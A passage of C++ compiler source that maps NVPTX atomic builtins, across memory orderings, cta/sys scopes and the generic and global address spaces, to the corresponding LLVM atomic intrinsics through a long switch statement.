return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_max_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_max_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_max_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_max_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_max_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_max_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_max_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_max_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_min_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_min_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_min_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_min_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_min_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_min_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_min_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_min_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_inc_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_inc_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_dec_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_dec_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_inc_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_inc_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_dec_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_dec_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_and_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_and_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_and_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_and_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_or_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_or_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_or_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_or_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_xor_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_xor_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_xor_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_xor_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_cas_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_cas_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_cas_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_cas_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_acquire_sys);
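// Release-ordered atomics on the generic address space (default scope).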
case NVPTX::BI__nvvm_atom_release_add_gen_i:
case NVPTX::BI__nvvm_atom_release_add_gen_l:
case NVPTX::BI__nvvm_atom_release_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_release);
case NVPTX::BI__nvvm_atom_release_add_gen_f:
case NVPTX::BI__nvvm_atom_release_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_release);
case NVPTX::BI__nvvm_atom_release_xchg_gen_i:
case NVPTX::BI__nvvm_atom_release_xchg_gen_l:
case NVPTX::BI__nvvm_atom_release_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_release);
case NVPTX::BI__nvvm_atom_release_max_gen_i:
case NVPTX::BI__nvvm_atom_release_max_gen_l:
case NVPTX::BI__nvvm_atom_release_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_release);
case NVPTX::BI__nvvm_atom_release_max_gen_ui:
case NVPTX::BI__nvvm_atom_release_max_gen_ul:
case NVPTX::BI__nvvm_atom_release_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_release);
case NVPTX::BI__nvvm_atom_release_min_gen_i:
case NVPTX::BI__nvvm_atom_release_min_gen_l:
case NVPTX::BI__nvvm_atom_release_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_release);
case NVPTX::BI__nvvm_atom_release_min_gen_ui:
case NVPTX::BI__nvvm_atom_release_min_gen_ul:
case NVPTX::BI__nvvm_atom_release_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_release);
case NVPTX::BI__nvvm_atom_release_inc_gen_ui:
case NVPTX::BI__nvvm_atom_release_inc_gen_ul:
case NVPTX::BI__nvvm_atom_release_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_release);
case NVPTX::BI__nvvm_atom_release_dec_gen_ui:
case NVPTX::BI__nvvm_atom_release_dec_gen_ul:
case NVPTX::BI__nvvm_atom_release_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_release);
case NVPTX::BI__nvvm_atom_release_and_gen_i:
case NVPTX::BI__nvvm_atom_release_and_gen_l:
case NVPTX::BI__nvvm_atom_release_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_release);
case NVPTX::BI__nvvm_atom_release_or_gen_i:
case NVPTX::BI__nvvm_atom_release_or_gen_l:
case NVPTX::BI__nvvm_atom_release_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_release);
case NVPTX::BI__nvvm_atom_release_xor_gen_i:
case NVPTX::BI__nvvm_atom_release_xor_gen_l:
case NVPTX::BI__nvvm_atom_release_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_release);
case NVPTX::BI__nvvm_atom_release_cas_gen_i:
case NVPTX::BI__nvvm_atom_release_cas_gen_l:
case NVPTX::BI__nvvm_atom_release_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_release);
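// Release-ordered generic-space atomics with an explicit _cta / _sys scope.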
case NVPTX::BI__nvvm_atom_release_cta_add_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_add_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_add_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_add_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_add_gen_f:
case NVPTX::BI__nvvm_atom_release_cta_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_add_gen_f:
case NVPTX::BI__nvvm_atom_release_sys_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_xchg_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_xchg_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_xchg_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_xchg_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_max_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_max_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_max_gen_ui:
case NVPTX::BI__nvvm_atom_release_cta_max_gen_ul:
case NVPTX::BI__nvvm_atom_release_cta_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_max_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_max_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_max_gen_ui:
case NVPTX::BI__nvvm_atom_release_sys_max_gen_ul:
case NVPTX::BI__nvvm_atom_release_sys_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_min_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_min_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_min_gen_ui:
case NVPTX::BI__nvvm_atom_release_cta_min_gen_ul:
case NVPTX::BI__nvvm_atom_release_cta_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_min_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_min_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_min_gen_ui:
case NVPTX::BI__nvvm_atom_release_sys_min_gen_ul:
case NVPTX::BI__nvvm_atom_release_sys_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_inc_gen_ui:
case NVPTX::BI__nvvm_atom_release_cta_inc_gen_ul:
case NVPTX::BI__nvvm_atom_release_cta_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_cta_dec_gen_ui:
case NVPTX::BI__nvvm_atom_release_cta_dec_gen_ul:
case NVPTX::BI__nvvm_atom_release_cta_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_inc_gen_ui:
case NVPTX::BI__nvvm_atom_release_sys_inc_gen_ul:
case NVPTX::BI__nvvm_atom_release_sys_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_sys_dec_gen_ui:
case NVPTX::BI__nvvm_atom_release_sys_dec_gen_ul:
case NVPTX::BI__nvvm_atom_release_sys_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_and_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_and_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_and_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_and_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_or_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_or_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_or_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_or_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_xor_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_xor_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_xor_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_xor_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_release_sys);
case NVPTX::BI__nvvm_atom_release_cta_cas_gen_i:
case NVPTX::BI__nvvm_atom_release_cta_cas_gen_l:
case NVPTX::BI__nvvm_atom_release_cta_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_release_cta);
case NVPTX::BI__nvvm_atom_release_sys_cas_gen_i:
case NVPTX::BI__nvvm_atom_release_sys_cas_gen_l:
case NVPTX::BI__nvvm_atom_release_sys_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_release_sys);
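// Acquire-release atomics on the generic address space (default scope).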
case NVPTX::BI__nvvm_atom_acq_rel_add_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_add_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_add_gen_f:
case NVPTX::BI__nvvm_atom_acq_rel_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_xchg_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_xchg_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_max_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_max_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_max_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_max_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_min_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_min_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_min_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_min_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_inc_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_inc_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_dec_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_dec_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_and_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_and_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_or_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_or_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_xor_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_xor_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_cas_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cas_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_acq_rel);
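// Acquire-release generic-space atomics with an explicit _cta / _sys scope.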
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_gen_f:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_gen_f:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_gen_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_gen_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_gen_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_gen_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_acq_rel_sys);
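// Atomics on the global address space. These repeat the same
// operation/ordering/scope matrix as the generic-space cases above,
// starting with the relaxed, default-scope forms.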
case NVPTX::BI__nvvm_atom_add_global_i:
case NVPTX::BI__nvvm_atom_add_global_l:
case NVPTX::BI__nvvm_atom_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i);
case NVPTX::BI__nvvm_atom_add_global_f:
case NVPTX::BI__nvvm_atom_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f);
case NVPTX::BI__nvvm_atom_xchg_global_i:
case NVPTX::BI__nvvm_atom_xchg_global_l:
case NVPTX::BI__nvvm_atom_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i);
case NVPTX::BI__nvvm_atom_max_global_i:
case NVPTX::BI__nvvm_atom_max_global_l:
case NVPTX::BI__nvvm_atom_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i);
case NVPTX::BI__nvvm_atom_max_global_ui:
case NVPTX::BI__nvvm_atom_max_global_ul:
case NVPTX::BI__nvvm_atom_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui);
case NVPTX::BI__nvvm_atom_min_global_i:
case NVPTX::BI__nvvm_atom_min_global_l:
case NVPTX::BI__nvvm_atom_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i);
case NVPTX::BI__nvvm_atom_min_global_ui:
case NVPTX::BI__nvvm_atom_min_global_ul:
